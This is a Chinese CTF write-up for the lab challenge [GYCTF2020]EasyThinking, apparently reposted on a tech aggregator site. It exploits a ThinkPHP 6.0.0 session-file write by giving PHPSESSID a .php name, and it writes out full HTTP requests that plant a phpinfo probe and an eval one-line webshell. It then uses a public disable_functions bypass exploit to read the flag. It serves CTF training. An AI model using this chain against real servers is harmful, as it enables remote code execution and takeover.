IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓ 		图片批量下载器
↓批量下载图片,美女图库↓ 		图片自动播放器
↓图片自动播放器↓ 		一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> Python知识库 -> [GYCTF2020]EasyThinking -> 正文阅读

[Python知识库][GYCTF2020]EasyThinking

[GYCTF2020]EasyThinking

输入url:

/1

页面报错,提示:ThinkPHP V6.0.0 { 十年磨一剑-为API开发设计的高性能框架 } - 官方手册。

用dirsearch扫描发现www.zip源码泄露,使用命令:

python dirsearch.py -u http://be2eaad1-b1cd-496a-9992-e5b410121b55.node4.buuoj.cn:81/ -e * --timeout=2 -t 1 -x 400,403,404,500,503,429 -w db/mylist.txt

-w参数表示使用自定义字典。审计下载的源码,找到app\home\controller\Member.php中的search()函数:

public function search()
    {
        if (Request::isPost()){
            if (!session('?UID'))
            {
                return redirect('/home/member/login');            
            }
            $data = input("post.");
            $record = session("Record");
            if (!session("Record"))
            {
                session("Record",$data["key"]);
            }
            else
            {
                $recordArr = explode(",",$record);
                $recordLen = sizeof($recordArr);
                if ($recordLen >= 3){
                    array_shift($recordArr);
                    session("Record",implode(",",$recordArr) . "," . $data["key"]);
                    return View::fetch("result",["res" => "There's nothing here"]);
                }

            }
            session("Record",$record . "," . $data["key"]);
            return View::fetch("result",["res" => "There's nothing here"]);
        }else{
            return View("search");
        }
    }

这个函数会把搜索框POST数据存到session文件里面,生成的session文件名规则即为sess_PHPSESSID。默认状态下 PHPSESSID 的长度为32个字符。

session_id

PHP中Session ID的实现原理

在vendor\topthink\framework\src\think\session\driver\File.php文件下,找到Session 文件驱动:

public function __construct(App $app, array $config = [])
    {
        $this->config = array_merge($this->config, $config);

        if (empty($this->config['path'])) {
            $this->config['path'] = $app->getRootPath() . 'runtime' . DIRECTORY_SEPARATOR . 'session' . DIRECTORY_SEPARATOR;
        } elseif (substr($this->config['path'], -1) != DIRECTORY_SEPARATOR) {
            $this->config['path'] .= DIRECTORY_SEPARATOR;
        }

        $this->init();
    }

说明session文件存在/runtime/session/目录下。注册后,搜索<?php phpinfo(); ?>时拦截请求,修改为:

POST /home/member/search HTTP/1.1
Host: 7e79368d-87d9-4ac2-aa0b-dbc00cc3f8b3.node4.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=1234567891234567891234567890.php
Connection: close
Content-Length: 23

key=<?php phpinfo(); ?>

发送请求后,请问文件输入url:

/runtime/session/sess_1234567891234567891234567890.php

类似这一题:[极客大挑战 2019]RCE ME,在phpinfo页面可以看到disable_functions。所以我们考虑绕过disable_functions。再次上传一句话木马:

POST /home/member/search HTTP/1.1
Host: 7e79368d-87d9-4ac2-aa0b-dbc00cc3f8b3.node4.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=1234567891234567891234567890.php
Connection: close
Content-Length: 23

key=<?php @eval($_POST["cmd"]);?>

利用蚁剑空白区域右击添加数据,设置如下:

URL地址  http://0c3b01c2-b1c6-4230-8940-13c54d50a157.node4.buuoj.cn:81/runtime/session/sess_1234567891234567891234567890.php
连接密码 cmd
网站备注
编码设置 UTF8
连接类型 PHP

其他不变。密码可以随便设置,要跟$_POST["cmd"]一致。

下载绕过disable_functions的脚本:

GitHub - mm0r1/exploits: Pwn stuff.

选择php7-gc-bypass/文件夹下的exploit.php,第十一行改为pwn("/readflag");,然后用蚁剑上传到服务器/var/tmp/目录下,刷新一下就可以看到已经上传成功。

POST /home/member/search HTTP/1.1
Host: 7e79368d-87d9-4ac2-aa0b-dbc00cc3f8b3.node4.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=1234567891234567891234567890.php
Connection: close
Content-Length: 23

cmd=<?php include("/var/tmp/exploit.php") ?>

输入url:

/runtime/session/sess_1234567891234567891234567890.php

得到flag。

References

[GYCTF2020]EasyThinking

BUUCTF:[GYCTF2020]EasyThinking_末初 · mochu7-CSDN博客

[GYCTF2020]EasyThinking
  Python知识库 最新文章
Python中String模块
【Python】 14-CVS文件操作
python的panda库读写文件
使用Nordic的nrf52840实现蓝牙DFU过程
【Python学习记录】numpy数组用法整理
Python学习笔记
python字符串和列表
python如何从txt文件中解析出有效的数据
Python编程从入门到实践自学/3.1-3.2
python变量
上一篇文章      下一篇文章      查看所有文章
加:2021-10-09 16:14:15  更:2021-10-09 16:16:24 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 18:49:59-

图片自动播放器
↓图片自动播放器↓ 		TxT小说阅读器
↓语音阅读,小说下载,古典文学↓ 		一键清除垃圾
↓轻轻一点,清除系统垃圾↓ 		图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码